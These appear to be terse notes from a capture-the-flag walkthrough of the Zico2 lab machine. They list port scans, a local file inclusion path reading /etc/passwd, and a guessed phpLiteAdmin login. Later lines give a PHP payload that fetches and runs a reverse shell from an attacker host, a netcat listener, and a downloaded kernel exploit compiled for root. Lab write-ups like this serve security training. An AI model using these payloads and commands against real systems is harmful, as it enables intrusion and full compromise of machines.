Zico2
Enumeration
6: 80/http
7: website inspection
8: LFI vulnerability
9: 10.0.2.9/view.php?page=/../../etc/passwd
Found User(zico)
10: dirb http://10.0.2.9/
11: dbadmin directory
12: Login page
13: randomly guess password
successfully logged in
14: searchsploit phpLiteAdmin
5: 111/rpcbind
searchsploit rpcbind
No exploit found
3: 22/ssh
check ssh version
4: searchsploit OpenSSH_8.0p1
No exploit found
Scanning
1: nmap -sn 10.0.2.1/24
2: nmap 10.0.2.9
Exploit & Privilege Escalation
15: create new table
execute python script
16: <?php exec("wget 10.0.2.10/shell.txt -O /tmp/reverse.php; php /tmp/reverse.php"); ?>
17: nc -lvp 1234
found kernel version
18: linux zico 3.2.0-23 generic
19: searchsploit 3.2.0
20: wget http://10.0.2.10/33589.c -O /tmp/exploit.c
21: gcc exploit.c -O2 -o exploit
22: python -c "import pty; pty.spawn('/bin/bash')"
23: root@zico:/cd /root